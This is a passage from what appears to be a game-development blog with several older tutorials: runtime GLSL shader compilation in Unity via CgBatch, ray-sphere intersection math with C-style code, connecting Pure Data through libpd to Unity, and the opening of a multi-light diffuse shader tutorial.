Otherwise, all that’s new here is the lerp function. In this example, rather than reflecting anything, our Fresnel Rim is just a single color (_Color), but the principle is the same. If you wanted to turn the rim into a reflection, you’d simply replace the _Color variable with a color sampled from a cube map, or taken from a camera, or however else you want to pass in a reflection.

Otherwise though, this is all there is to writing a simple Fresnel shader, so go forth and make all of your objects more believable! And feel free to download the Fresnel Shader Pack that I’ve posted in the graphics section of this site to see some examples of more complicated Fresnel effects.

If you’ve spotted an error on here, or have anything to add, feel free to send me a message on twitter. Happy shading!

Creating GLSL Shaders at Runtime in Unity3D

2014-01-12T00:00:00+00:00

NOTE: This article is for an old version of Unity (Unity 4...sometime in 2014) and probably won't run anymore. Beware!

The feeling of solving a problem that seems potentially impossible is awesome. My latest project is no exception.

The concept involves users being able to write shaders while the program is running, and compiling them at runtime onto objects in the scene. Normally this wouldn’t be an unreasonable task, however this project is being built in Unity, which complicates things immensely.

I had seen an example of shaderlab code being passed to the Material constructor at runtime before, but I hadn’t ever seen anyone play around with any other shader language in the same way. It turns out that’s because you can’t. The Material constructor that I was hoping to use only accepts Shaderlab; Unity doesn’t support runtime compilation of GLSL, Cg, or HLSL, end of story.

Except that isn’t the whole story. If it was, this would be a very short post. It turns out that with some elbow grease, you can actually get other languages (or at least GLSL) to compile. The rest of this post is going to show you how.

Type the fragment shader into the box, hit the button, watch the magic happen

Setting Up Your Project

There are at least a few people who have tried to make this work before. A quick google search for “runtime shader compilation unity” will bring you to this Unity forum post. If you scroll down you’ll find a post from a user named Sirithang, who is the real unsung hero of this post.

Their post talks about a tool called CgBatch, which is included with Unity, and according to this SIGGRAPH presentation, is either the entire shader compilation pipeline for Unity, or is at least one step in it. The siggraph link only describes it as a tool to generate HLSL, but in practice it seems to fully translate shaders into a format accepted by that material constructor from above. Since CgBatch isn’t meant for public use, there isn’t anything in the way of documentation to know for sure.

Ok, so we know we need to use CgBatch, but where do we get it? On Mac, you can find it inside of Unity.app (right click and select “Show Package Contents”), inside the Tools folder. On Windows, you’re looking for CgBatch.exe, located in Unity/Editor/Data/Tools (thanks to @izaleu for finding this on Windows :D). Create a folder inside your project’s StreamingAssets directory and paste CgBatch into it (it must be inside a subdirectory of StreamingAssets).

CgBatch also relies on Cg.framework, which you can find in the Unity.app/Contents/Frameworks folder. If you try to run CgBatch however, you’ll notice that it actually relies on Cg.framework being located in “../Frameworks/Cg.framework”, so copy and paste the entire folder into your project’s StreamingAssets folder.

Finally, you will need to provide a path to the CGInclude files as part of using CgBatch, and since we don’t want our users to have to have Unity installed to use our program, you will also need to copy the CGIncludes folder to your StreamingAssets directory.

Aside: If you’ve never used the StreamingAssets folder before, it is simply a folder named “StreamingAssets” that you place in your project’s assets folder. Everything in this folder will be included exactly as is in your built project, at Application.streamingAssetsPath.

Deciphering CgBatch

So how do you use CgBatch? If you’ve attempted to run it from the command line you’ve probably seen the following message:

E -1: Failed to launch CgBatch (incorrect parameters). Usage: CgBatch input path includepath output [-xbox360] [-ps3]

So CgBatch needs at least 4 parameters. Based on the forum post linked previously, these arguments are as follows:

input : The path to your uncompiled shader file
path : The path to the directory that contains your shader
includepath : The path to the CGInclude files for Unity
output : Where to put the output shader file.
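
Since the order of those four arguments is easy to get wrong, here is a tiny C++ sketch of assembling the command line in the order the usage message gives. The function name buildCgBatchCommand and every path in the usage note are hypothetical, and the sketch does no quoting, so it assumes none of the paths contain spaces.

```cpp
#include <string>

// Joins the tool path and its four required arguments with single spaces,
// in the order from the usage message: input path includepath output.
std::string buildCgBatchCommand(const std::string& tool,
                                const std::string& input,
                                const std::string& shaderDir,
                                const std::string& includeDir,
                                const std::string& output)
{
    return tool + " " + input + " " + shaderDir + " " + includeDir + " " + output;
}
```

For example, buildCgBatchCommand("Tools/CgBatch", "in.shader", "shaders/", "CGIncludes/", "out.shader") produces a single string with exactly four space-separated arguments after the tool name. Leaving out one of the separating spaces silently merges two arguments into one, which is enough to trigger the “incorrect parameters” error.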

If you run this with the appropriate parameters, you should be able to get output that can be accepted by the Material shader string constructor, which is great! So now we need to be able to do this inside a running program.

Introducing System.Diagnostics

Thankfully, Mono has us covered (even on Mac!). The Process class (inside System.Diagnostics) is specifically designed to run command line applications, and can be configured to execute programs in bash as well as the windows command line.

The way to do this is to create a new Process object, and use that object’s StartInfo property to specify exactly what command and arguments you wish to execute, and then call Process.Start();

In practice, this looks like the following:

using System.Diagnostics;
	
Process process = new Process();
process.StartInfo.FileName = "bash";
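//command, arg1 and arg2 are placeholder strings for whatever you want to run;
//append any further arguments the same way
process.StartInfo.Arguments = "-c '" + command + " " + arg1 + " " + arg2 + "'";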
process.StartInfo.RedirectStandardOutput = true;
process.StartInfo.UseShellExecute = false;

process.Start();

(the above is mac specific, I don’t have a windows machine to try this stuff out on right now)

As shown above, the name of the command that you need to execute is actually bash, and not CgBatch. In order to execute a command from bash, you need to pass that command as an argument to bash using the -c flag, enclosing the command and all its arguments inside single quotes.

Setting RedirectStandardOutput to true allows us to read the output of the command into the Unity console (really handy for debugging), but in order for that to work, UseShellExecute needs to be set to false, which means that we will not be using the operating system shell to launch the program (in this case bash), we will launch bash directly.

Actually Making This Work

Now that we have our tools set up and we know how to execute CgBatch, it’s time to put it all together.

For the proof of concept, I only wanted users to write fragment shaders, so I needed to provide a vertex shader for them:

	
string prefix = "Shader \"Temp\"{\nProperties{\n}\nSubShader {" +
	"\nTags { \"Queue\" = \"Geometry\" }\nPass {\nGLSLPROGRAM\n#ifdef VERTEX\n" +
	"void main(){\n" +
	"gl_Position = gl_ModelViewProjectionMatrix * gl_Vertex;\n" +
	"}\n" +
	"#endif\n" +
	"#ifdef FRAGMENT\n" +
	"uniform float _time;\n";

The above example is for writing a glsl shader at runtime. I haven’t yet been able to get Cg compiling using the method presented in this post, but I’m sure it can be done with the right arguments to CgBatch.

You’ll notice I’m also including a uniform for time. This is because I have yet to figure out how to get Unity’s specific constants to be recognized in the user-written shader, and time is useful enough that I’m passing it in myself (just call the Shader.SetGlobalFloat method in Update to do the same).

Next up, we need to write the code that will come after the user’s fragment shader to finish off the shader file:

	
string suffix = "\n#endif\nENDGLSL}}}";

As the variable names suggest, the user’s fragment shader will be positioned in between these two strings when building our input file.

Get the user input however you see fit (as the picture earlier showed, I’m using Unity’s GUI class for now), and then assemble the full file string with prefix+USERINPUT+suffix.

Once you’ve assembled the full shader string, you need to write it to a file, since CgBatch expects the input parameter to be a file path. Since we don’t want this file to persist between runs, I’m writing the input file to Application.temporaryCachePath.

	
byte[] byteShader = System.Text.Encoding.UTF8.GetBytes(prefix+shader+suffix);

var tempShader = File.Create(Application.temporaryCachePath+"/tempshader.shader");
//write the whole byte array; a string's Length counts characters, not UTF8 bytes
tempShader.Write(byteShader,0,byteShader.Length);
tempShader.Close();

Finally, we need to read in the output and actually build a material out of it. All together, the shader compilation process looks like the following:

	
byte[] byteShader = System.Text.Encoding.UTF8.GetBytes(prefix+shader+suffix);

var tempShader = File.Create(Application.temporaryCachePath+"/tempshader.shader");
//write the whole byte array; a string's Length counts characters, not UTF8 bytes
tempShader.Write(byteShader,0,byteShader.Length);
tempShader.Close();

Process compileProcess = new Process();
compileProcess.StartInfo.FileName = "bash";

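//the four arguments are: input, path, includepath, output
//(note the trailing space that separates includepath from output)
compileProcess.StartInfo.Arguments = "-c '"
	+Application.streamingAssetsPath
	+"/Tools/CGBatch "
	+Application.temporaryCachePath
	+"/tempshader.shader ../CGIncludes/ ../CGIncludes/ "
	+Application.temporaryCachePath
	+"/testOutput.shader'";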
	
compileProcess.StartInfo.RedirectStandardOutput = true;
compileProcess.StartInfo.UseShellExecute = false;

compileProcess.Start();
var output = compileProcess.StandardOutput.ReadToEnd();
compileProcess.WaitForExit();

string compiled = File.ReadAllText(Application.temporaryCachePath
		+"/testOutput.shader");
									
Material m = new Material(compiled);
cube.renderer.material = m;

UnityEngine.Debug.Log(output);

The above has only been tested on mac. On Windows, you will need to replace “bash” with “cmd” and the arguments with whatever is appropriate for your system. I unfortunately don’t have a Windows machine to test it out (again, send me a message on twitter and I’ll update this).

But, provided you’re on Mac, or have figured out the Windows changes, you should now be able to compile GLSL at runtime! You laugh in the face of Unity not supporting this feature!

You may also notice that your build product is 50MB larger than you expect. This is because we’re including all of Cg.framework with our project so that CgBatch can use it during compilation. I expect that this extra file size is one of a number of reasons that Unity has opted to leave this feature out by default.

That’s all for now! Hopefully this wall of text has opened up a whole world of experimental gameplay to you! I’d love to hear about any improvements to the above, any further knowledge about CgBatch, and especially any other tricks like this that allow weird stuff to be done in my favourite engine, so as I’ve said twice already, TWITTER!

Ray-Sphere Intersection with Simple Math

2013-12-24T00:00:00+00:00

NOTE: This article is OLD! (From 2013!). Information in it may be out of date or outright useless, and I have no plans to update it. Beware!

Lately I’ve been working on a ray tracer. It’s been going well (or at least as well as I could hope my first renderer could go), but it has been a slow process. I don’t have a formal math background - my day to day work only ever goes as far as enough linear algebra to write shaders, and enough of everything else to implement whatever gameplay I need - and none of this prepared me for the endless pages of ray tracing resources that expected much more math knowledge than I have.

The current output of my ray tracer

So I thought that I’d do my part for the next person who starts writing a ray tracer, and share a bit of what I’ve figured out in as much detail as possible, as clearly as possible.

As the title of this post suggests, the end product of this post will be a function which takes a ray and a sphere, and returns both whether they intersect and, if so, the location of the intersection(s).

What you need to know before starting

I’m going to try to keep things as basic as possible. In order to follow this post, you’ll need:

a basic understanding of trigonometry
a good handle on vector math (including dot products)

Have you got that? Good! If not, there are a bazillion resources online, go check one of them out before proceeding.

Representing our objects

The first thing we need to get a handle on is how to best represent a ray. If you recall from high school geometry, a ray consists of a single point (the origin), and extends from that origin indefinitely along a direction vector. So for our purposes, a ray is simply a struct which consists of an origin vector and a direction vector.

struct Ray
{
	vec3 origin;
	vec3 direction;
};

With these 2 vectors, we can represent any point on the ray like this:

Origin + Direction * t = Point

Each point will have a specific t value, representing how far along the direction vector the point lies, but the equation remains the same otherwise. This will be important later, so make sure that you try this out on paper and really understand it before proceeding.
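
If you’d rather try it in code than on paper, here is a minimal C++ sketch of that equation. Vec3 is a hypothetical stand-in for whatever vec3 type you are using, and pointAt is a name made up for this example.

```cpp
// Hypothetical minimal vector type for the example.
struct Vec3 { float x, y, z; };

struct Ray
{
    Vec3 origin;
    Vec3 direction;
};

// Point = Origin + Direction * t
Vec3 pointAt(const Ray& r, float t)
{
    return { r.origin.x + r.direction.x * t,
             r.origin.y + r.direction.y * t,
             r.origin.z + r.direction.z * t };
}
```

For a ray starting at (1, 2, 3) and pointing along +z, t = 2 gives the point (1, 2, 5), and t = 0 always gives back the origin.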

Spheres are even simpler. Given that spheres don’t have a direction, all we need is the location of the center point, and the radius of the sphere. This means our sphere object will simply be a struct containing one vector and one float.

struct Sphere
{
	vec3 center;
	float radius;
};

Turning Vectors into Scalar Values

Alright, so the image above shows the general lay of the problem. We have a ray and a sphere, we know the ray’s origin point and its direction, and we know the location of the sphere’s center point. What we want to do is determine if the ray will ever intersect the sphere (spoiler: in this tutorial, it will), and if so, where that intersection occurs.

There are 2 points that I haven’t mentioned yet, labelled above as P1 and P2, these are the points that we want to solve for, as both of these represent a point of intersection.

Speaking of those points, remember that we can solve for any point on a ray with the following equation:

Origin + Direction * t = Point

So, in order to get the locations of P1 and P2, all we need to do is find the correct t value for each of them. This is going to make our lives a lot easier, provided you remember a bit of trig (don’t worry, I didn’t either, we’ll go over it as we get to it), since now all we need to do is find 1 number for each point, instead of their exact co-ordinates.

While we’re identifying values to solve for, there are two more t values that are important to us, shown below in blue and green: tc is the distance from the origin to a point on the ray halfway between the 2 intersection points, and t1c is the distance between t1 and tc. We’ll see why these are important in a minute.

To review, these t values have been labelled t1, t2, tc and t1c. t1 and t2 correspond to the points P1 and P2 on our diagram, tc is the t value of the point halfway between them (which is also the point on the ray closest to the sphere’s center), and t1c is the distance between P1 and that halfway point.

Finding tc

As the headline suggests, the first value we need to solve for is tc. As the diagram below shows, the first step to finding tc is to create a right angle triangle, using tc, the vector from the ray’s origin to the sphere’s center (L), and a line (d) from the center to the ray.

The first thing we need to find is the vector L. This is simple enough, since we know the positions of both the center and ray origin.

L = C - Origin

Once we have L, we can use the dot product between L and the ray’s direction in order to get the value for tc (this assumes the direction vector is normalized, otherwise the result is scaled by the direction’s length). Don’t worry if this seems unintuitive, it had been awhile since I used dot product for projections too. Luckily there are lots of good resources out there that explain this concept (like this one). Moving on though, this means that we have found the value for tc:

tc = L · Direction

This is an important calculation. If tc is less than 0, the sphere’s center is behind the ray’s origin, which (as long as the origin isn’t inside the sphere) means that the ray does not intersect the sphere, and we can bail out of our intersection test early. If it’s not less than 0, we move on.
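
To see the projection in action, here is a small C++ sketch that computes tc for a couple of sphere positions. Vec3, dot and projectOntoRay are hypothetical names for this example, and the direction is assumed to be normalized.

```cpp
// Hypothetical minimal vector type for the example.
struct Vec3 { float x, y, z; };

static float dot(Vec3 a, Vec3 b) { return a.x * b.x + a.y * b.y + a.z * b.z; }

// Returns tc: how far along the (normalized) direction you have to travel
// from origin to reach the point on the ray closest to center.
float projectOntoRay(Vec3 origin, Vec3 direction, Vec3 center)
{
    Vec3 L = { center.x - origin.x, center.y - origin.y, center.z - origin.z };
    return dot(L, direction);
}
```

With the origin at (0, 0, 0) and a direction of (1, 0, 0), a center at (3, 4, 0) gives tc = 3, while a center at (-2, 1, 0) gives tc = -2, meaning the closest point is behind the ray’s origin.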

The last thing we need to do with this triangle is solve for the length of d. This isn’t important for tc, but will be in the next section, so we may as well do it now while we’re still thinking about this triangle.

To solve for d, we need to bust out some high school math. If you’re like me, you’ll need a bit of a refresher on this, and I found that it was helpful to rotate our triangle around bit to put it in a more familiar orientation.

Looking familiar yet? If you can remember Pythagoras’ Theorem, you’ll already know where I’m going with this. If not, I’ll help:

a² + b² = c²

We need to find d, which in this case is edge b, so we need to rearrange the equation a bit:

b² = c² - a²
b = √(c² - a²)

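Now we just sub in our known values from earlier. L is the hypotenuse (c) and tc is edge a, and L² here means the squared length of L (that is, L · L):

d = √(L² - tc²)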

Just like tc before it, this is an important calculation. If d is greater than the radius of our sphere, it means that the closest the ray ever gets to the center is still outside of the sphere, so our ray doesn’t intersect at all (and we can go home early).

If not, great! Time to move on to the next triangle.

Solving for t1c

Now that we have tc and d, this is actually incredibly easy. We already know the length of the edge labelled h (it’s the radius of the sphere) and the length of d, so using Pythagoras’ Theorem again gives us:

a² = c² - b²
a = √(c² - b²)
t1c = √(radius² - d²)

Guess that means it’s time to move on to yet another subheading eh?

Solving for t1 and t2

Let’s look at our original diagram again:

Notice anything? Now that we have values for t1c and tc, solving for the two variables we actually want is trivial!

t1 = tc - t1c
t2 = tc + t1c

Which means that all we need to do to get our intersection points is:

P1 = Origin + Direction * t1
P2 = Origin + Direction * t2

An Intersect Function

Congratulations on getting this far! Now that we have all that theory out of the way, it’s time for your prize: a sphere intersection function! Let’s see what that might look like if we simply went step by step using the instructions above:

	
bool intersect(Ray* r, Sphere* s)
{
	//solve for tc
	//L is a vector, so it needs a vector type (vec3 and dot() are assumed to come from your math library)
	vec3 L = s->center - r->origin;
	float tc = dot(L, r->direction);
	if ( tc < 0.0 ) return false;
	
	//solve for d (L is the hypotenuse, so its squared length comes first)
	float d = sqrt(dot(L, L) - (tc*tc));
	if ( d > s->radius) return false;
	
	//solve for t1c
	float t1c = sqrt( (s->radius * s->radius) - (d*d) );
	
	//solve for intersection points
	float t1 = tc - t1c;
	float t2 = tc + t1c;
	
	return true;
}

For really basic use cases, the above may be sufficient, but there’s an awful lot of wasted effort up there (like calculating t1 and t2 and then not using them). For a ray tracer (the use case that led me to writing this post) it isn’t enough just to know if a ray hits an object, you need to know exactly where the point of contact is.

So let’s rethink the above function (and optimize it in the process):

	
bool intersect(Ray* r, Sphere* s, float* t1, float *t2)
{
	//solve for tc
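	//L is a vector (vec3 and dot() are assumed to come from your math library)
	vec3 L = s->center - r->origin;
	float tc = dot(L, r->direction);
	
	if ( tc < 0.0 ) return false;
	//squared distance from the sphere's center to the ray
	float d2 = dot(L, L) - (tc*tc);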
	
	float radius2 = s->radius * s->radius;
	if ( d2 > radius2) return false;

	//solve for t1c
	float t1c = sqrt( radius2 - d2 );

	//solve for intersection points
	*t1 = tc - t1c;
	*t2 = tc + t1c;
	
	return true;
}

Much better! Not only are we getting the solved t values out of the function, but we’ve also managed to get rid of a costly square root operation. This may not seem like a big deal, but when you factor in how many times you will be calling this intersect function, any optimizations you can make pay dividends.
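If you want something you can compile and poke at, here’s a minimal self-contained sketch of the same function. The Vec3, Ray and Sphere types and the pointAt helper are stand-ins I’m assuming for illustration (use whatever your math library gives you), and the ray direction is assumed to be normalized.

```cpp
#include <cmath>

// Hypothetical minimal vector type, just enough for this example.
struct Vec3 { float x, y, z; };

Vec3 operator-(Vec3 a, Vec3 b) { return {a.x - b.x, a.y - b.y, a.z - b.z}; }
Vec3 operator+(Vec3 a, Vec3 b) { return {a.x + b.x, a.y + b.y, a.z + b.z}; }
Vec3 operator*(Vec3 a, float s) { return {a.x * s, a.y * s, a.z * s}; }
float dot(Vec3 a, Vec3 b) { return a.x * b.x + a.y * b.y + a.z * b.z; }

struct Ray    { Vec3 origin; Vec3 direction; };  // direction assumed unit length
struct Sphere { Vec3 center; float radius; };

bool intersect(const Ray& r, const Sphere& s, float* t1, float* t2)
{
    // solve for tc: project L onto the ray direction
    Vec3 L = s.center - r.origin;
    float tc = dot(L, r.direction);
    if (tc < 0.0f) return false;

    // squared distance from the sphere's center to the ray
    float d2 = dot(L, L) - tc * tc;
    float radius2 = s.radius * s.radius;
    if (d2 > radius2) return false;

    // solve for t1c, then the two intersection distances
    float t1c = std::sqrt(radius2 - d2);
    *t1 = tc - t1c;
    *t2 = tc + t1c;
    return true;
}

// P = Origin + Direction * t
Vec3 pointAt(const Ray& r, float t) { return r.origin + r.direction * t; }
```

Shooting a ray from the origin down +z at a unit sphere centered on (0, 0, 5) should give t1 = 4 and t2 = 6, and pointAt(ray, t1) is then the near contact point. Note that, like the version above, the tc < 0 early-out also rejects a ray that starts inside a sphere whose center is behind it.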

Whew, that was a long post. If anything is unclear, or you spot a mistake (I wrote most of this on a train, it’s very possible something is a bit off) feel free to send me a message on Twitter.

Merry Christmas! :D

Combining Pure Data and Unity

2013-11-10T00:00:00+00:00

NOTE: This article is OLD! (From 2013!). Information in it may be out of date or outright useless, and I have no plans to update it. Beware!

About 6 months ago, for 1GAM, Johannes and I spent a month tinkering with LibPD (the end result was Synapse). LibPD, for those of you who don’t know, is a library for working with Pure-Data, a visual programming tool for procedural audio. Out of the box, it doesn’t work nicely with Unity, but there’s a repository called libpd4unity that simplifies the process.

The sample pd program used in this tutorial

Libpd4unity isn’t suited to really in depth PD development in Unity (at the moment it seems to only support loading one patch at a time), but you can still do some interesting things with it. So today, I’m going to go over the process of setting up libpd4unity with Unity.

If you’re on mac, you may be a bit disappointed to see that there isn’t a mac compatible pd library in the libpd4unity repo, so the first step for us is to compile a .bundle for mac. If you’re on windows, skip down to the actual programming.

Building libpdcsharp.bundle

Thankfully this is pretty straightforward, if a bit weird:

Download the LibPD Project from github
In terminal, cd into the downloaded project folder and type the command make csharplib
libpdcsharp.dylib should now be created inside the libs folder. Copy that to the Assets/Plugins folder in Unity
Rename this file to libpdcsharp.bundle. Unity has a problem locating dylibs.
You’re good to go!

LibPD and Unity

Note: You will need to download Libpd4Unity

Ok now that that’s out of the way, it’s time for some fun stuff. First off, copy the LibPD folder from libpd4unity/Assets, and paste it into the assets folder of your project.

Next, make an Assets/Resources folder. This is a special folder that allows you to specify resources that you want to have available to Unity at runtime. Put your patches in this folder (or a subfolder of it). If you don’t have a patch to work with, or want to follow along exactly with this demo, you can grab the simple sine patch from the repo for this post’s example project (patch courtesy of johannesg.com ).

Now that all the housekeeping is taken care of, it’s time to actually interact with a patch program from Unity. LibPd4Unity comes with an example script called LibPdFilterRead.cs that will serve as the basic outline for our class, but we’re going to tailor ours to suit our needs a bit better.

using UnityEngine;
using System.Collections;
using LibPDBinding;
using System;
using System.Runtime.InteropServices;

public class OSCControl : MonoBehaviour
{
	public string patch;
	public bool playOnAwake = false;		
	public bool patchIsStereo = false;

	private int patchName;
	private bool islibpdready;
	private string path;
	private GCHandle dataHandle;
	private IntPtr dataPtr;
	private float freq = 500;

The script I’m going to build here interacts with the sample patch linked above.

Let’s go through these variables:

patch: the name of the patch file to use
playOnAwake: what it says on the tin
patchIsStereo: only check this if you are SURE your patch is stereo, otherwise you’ll hear garbled crap
patchName: the integer patch name generated by LibPD
islibpdready: does what it says on the tin
path: this will be the patch variable with the rest of the filepath prepended to it
dataHandle: this will eventually be used to let us have access to the audio stream from pd without worrying about the garbage collector
dataPtr: this will hold the address of the pinned audio buffer that we hand to pd
freq: the frequency we want to pass to our program

Now let’s get to some functionality

void Awake ()
{
	path = Application.dataPath + "/Resources/" + patch;
	if ( playOnAwake)loadPatch ();
}

public void loadPatch ()
{
	if(!islibpdready)
	{
		if (!patchIsStereo)	LibPD.OpenAudio (1,1, 48000);
		else LibPD.OpenAudio(2,2,48000);
	}

	patchName = LibPD.OpenPatch (path);
	LibPD.ComputeAudio (true);
	islibpdready = true;
}

Awake isn’t all that interesting, except to show off how to get the actual file path to the patch. Also note that loadPatch() needs to be called before we can start working with pd.

loadPatch is the standard initialization sequence for working with libPd.

I’m going to hold off on the good stuff until the end, so we’re going to skip from the initialization process down to the cleanup process. This is a little more involved than the usual in C# because we are explicitly telling the garbage collector to not interact with the data stream, so we need to do a bit of manual memory management. This is taken directly from the example project in LibPd4Unity.

public void closePatch ()
{
	LibPD.ClosePatch (patchName);
	LibPD.Release ();
}

void OnApplicationQuit ()
{
	closePatch ();
}

public void OnDestroy()
{
	dataHandle.Free();
	dataPtr = IntPtr.Zero;
}

I don’t have a good explanation for why we don’t need to free the dataHandle on close patch, so if anyone has an idea, shoot me a message on twitter and I can update the post. Otherwise, this is boilerplate code that will need to be added to every class that you write that will handle loading a Pd program.

And now finally, the good stuff!

public void OnAudioFilterRead (float[] data, int channels)
{
	if(dataPtr == IntPtr.Zero)
	{
		dataHandle = GCHandle.Alloc(data,GCHandleType.Pinned);
		dataPtr = dataHandle.AddrOfPinnedObject();
	}

	if (LibPD.Process(32, dataPtr, dataPtr)==0) {
		LibPD.SendFloat(patchName + "freq1", freq);
		LibPD.SendFloat(patchName + "freq2", freq);

	}
}

void OnGUI()
{
	Rect r = new Rect(Screen.width/2 - 50 ,
			Screen.height/2 - 150,
			100,
			300);

	freq = GUI.VerticalSlider(r,freq,1000, 400);

	Rect r2 = new Rect(Screen.width/2-30,
			Screen.height/2 - 30,
			80,
			30);

	GUI.Box(r2, ""+freq+" hz");
}

OnAudioFilterRead is the Unity callback that LibPd4Unity’s example hooks into. Unity calls it each time it has a buffer of audio samples to process. I’m really not sure why we’re checking that LibPD.Process returns 0, although I assume that’s LibPD’s “all good” return value. Inside that block you can see how to pass messages to the currently running patch. What tripped me up for a while was both the need to prepend the target value’s name with the int name of the loaded patch, and the need to leave off the “$0” part of the variable name, which is displayed when you open the patch in pd.
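To make that naming rule concrete, here’s a tiny sketch of the string logic on its own (written in C++ rather than C#, purely as an illustration). receiverName is a hypothetical helper, not part of LibPD, and I’m assuming the receiver shows up in pd as “$0freq1”.

```cpp
#include <string>

// Hypothetical helper: pd shows the receiver as "$0freq1", but the name
// you send to is the integer patch handle followed by the rest of the
// name, with the "$0" part dropped.
std::string receiverName(int patchHandle, const std::string& nameWithoutDollarZero)
{
    return std::to_string(patchHandle) + nameWithoutDollarZero;
}
```

So if the handle returned when opening the patch were 1003, the message would be sent to “1003freq1”, which is the same string that patchName + "freq1" builds in the C# above.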

Building a Project on Mac

Everything should now work fine in the editor, but if you’re on mac, your journey is not over yet!

If you have tried to actually create a build, you will have noticed the big, ugly error message that pops up:

Error building Player: IOException: Cannot create Temp/StagingArea/UnityPlayer.app/Contents/Plugins/libpdcsharp.bundle/libpdcsharp.bundle because a file with the same name already exists.

Apparently Unity really really hates people who use libpd. Thankfully, there is a solution!

Remove libpdcsharp.bundle from your plugins folder (but don’t delete it, we’ll need it in a second)
Build your project as you normally would
Locate the .app file that you just built, right click on it, and select “Show Package Contents,” and open the “Contents” folder within
If there is no folder named “Plugins” inside Contents, create one now.
Paste libpdcsharp.bundle into the Plugins folder
Go back to your Unity project, and copy the .pd file from your resources folder
Paste this file into the Resources folder located inside your .app’s Contents folder.

All of this is necessary because Unity’s build process doesn’t like the libpdcsharp bundle, and attempts to copy it multiple times (creating that ugly error), and completely ignores the patch file in Resources because it doesn’t recognize the file extension. Thankfully, all that’s needed to resolve this is a mildly annoying process.

If you’ve made it this far, you should now have a unity project that can interact with Pure Data plugins, and can actually create builds! Congratulations! If you’ve hit any difficulties or need further clarification on something I’ve said here, you can download a sample project from my dropbox, or send me a message on Twitter. Hope this tutorial helped!

Writing Multi-Light Pixel Shaders in Unity

2013-10-13T00:00:00+00:00

NOTE: This article is OLD! (From 2013!). Information in it may be out of date or outright useless, and I have no plans to update it. Beware!

One of the first things that people get shown when they start learning shaders is how to write a simple, single light, diffuse shader. I have yet to see a single shader tutorial out there that ever returns to this initial exercise to demonstrate how to write shaders which can properly interact with multiple (and different kinds of) lights. So I’m going to try to fill in that gap with what I’ve managed to figure out on my own.

This will hopefully serve as a good starting point for any truly custom lighting shaders you want to write. To be clear, the end goal of this tutorial is simply to have a pixel shader that looks as close as possible to the built in Diffuse shader. The end result of this shader looks like this:

Our shader is on the left, compared to the built in diffuse on the right

Ok, let’s get started with a basic skeleton of what we’re building. Multi-light shaders (in Forward Rendering) use a separate pass for each pixel light in the scene. How this looks in practice is 2 defined passes in the shader. One (the Base Pass) renders the first light in the scene, and the second pass (the Add pass) gets called once for each additional light, and is additively blended with the previous passes. It looks something like this:

  
Shader "BetterDiffuse" 
{
  Properties 
  {
  _Color ("Main Color", Color) = (1,1,1,1)
  _MainTex ("Base (RGB) Alpha (A)", 2D) = "white" {}
  }
  SubShader 
  {

  Tags {"Queue" = "Geometry" "RenderType" = "Opaque"}
  Pass 
  {
  Tags {"LightMode" = "ForwardBase"}     
  CGPROGRAM
  #pragma vertex vert
  #pragma fragment frag
  
  ENDCG
  }
 
  Pass 
  {
  Tags {"LightMode" = "ForwardAdd"}    
  Blend One One  
  CGPROGRAM
  #pragma vertex vert
  #pragma fragment frag
   
  ENDCG
  }
  }
  Fallback "VertexLit"
}

Nothing compiles yet, but at least we have the basic structure we’re going to use in place. You can see above that the base and add passes are marked using the LightMode tag. This is a tag which tells unity which pass to use for which. The “Forward” prefix on Add and Base identifies that these passes are for Forward rendering. This tutorial won’t cover Deferred Rendering (mostly because I haven’t wrapped my head around it yet).

If you’re wondering, the fallback to VertexLit allows us to use the VertexLit shader’s shadow passes. Our shader will not cast shadows properly without this.

Next, let’s look at what our vertex input and output structs need to be:

  
struct vertex_input
{
  float4  vertex  : POSITION;
  float3  normal  : NORMAL;
  float4  texcoord  : TEXCOORD0;
};

  
struct vertex_output
{
  float4  pos   : SV_POSITION;
  float2  uv  : TEXCOORD0;
  float3  lightDir  : TEXCOORD1;
  float3  normal  : TEXCOORD2;
  LIGHTING_COORDS(3,4) 
};

Output wise, we need the obvious position, uv coords and vertex normal. We also need to get the vector from our vertex to the current light in object space. Finally, we need to grab light attenuation information, and shadow info. Unity has a macro for grabbing those last two items, LIGHTING_COORDS(x,y). This macro will put lighting info into TEXCOORDX and shadow info into TEXCOORDY. This takes care of the messy business of dealing with all the different datatypes needed for different types of lights.

Just remember to include UnityCG.cginc, Lighting.cginc and AutoLight.cginc if you’re using the Unity macros.

Ok, things are looking pretty good here. Let’s move on to the vertex program. For the most part, the vertex program for each pass is fairly normal (for now, we’ll come back to this later when we talk about vertex lights).

vertex_output vert (vertex_input v)
{
  vertex_output o;
     
  o.pos = mul( UNITY_MATRIX_MVP, v.vertex);
  o.uv = v.texcoord.xy;
  o.normal =  v.normal;
    
  o.lightDir = ObjSpaceLightDir(v.vertex);
  TRANSFER_VERTEX_TO_FRAGMENT(o); 

  return o;
}

The 2 lines before the return bear a bit more explanation. ObjSpaceLightDir(float4 x) is a method provided in UnityCG.cginc. Simply put, it returns a vector going from the current vertex to the light in object space. You can check out its source in UnityCG.cginc if you’re interested in the details, but for our purposes, using the built in function will be fine.

TRANSFER_VERTEX_TO_FRAGMENT is the macro provided to transfer the data declared with LIGHTING_COORDS to the fragment program. It does some co-ordinate space conversions as well, but since we’re just going to grab the end values from all these calculations for our light attenuation, we don’t need to worry about them right now. For now our goal is just a pixel shader that looks like the Diffuse surface shader.

Alright, on to the fragment program for our passes. For one, we’re going to need to grab the colour from the texture we have applied to our mesh, and do a colour multiply on it to take into account the inspector inputs we defined at the top of the page. Then we’re going to be getting the lighting attenuation value from Unity. Finally, we’re going to use the lightDir variable we set in the vertex shader to calculate the diffuse lighting value with.

sampler2D _MainTex;
float4 _MainTex_ST;
fixed4 _Color;
fixed4 _LightColor0;

half4 frag(vertex_output i) : COLOR
{
  fixed4 tex = tex2D(_MainTex, i.uv * _MainTex_ST.xy + _MainTex_ST.zw);
  tex *= _Color;   

  fixed atten = LIGHT_ATTENUATION(i); 

  i.lightDir = normalize(i.lightDir);
   
  fixed diff = saturate(dot(i.normal, i.lightDir));
  
  fixed4 c;
  c.rgb = UNITY_LIGHTMODEL_AMBIENT.rgb * 2 * tex.rgb;   
  c.rgb += (tex.rgb * _LightColor0.rgb * diff) * (atten * 2); 
  c.a = tex.a + _LightColor0.a * atten;
  return c;
}

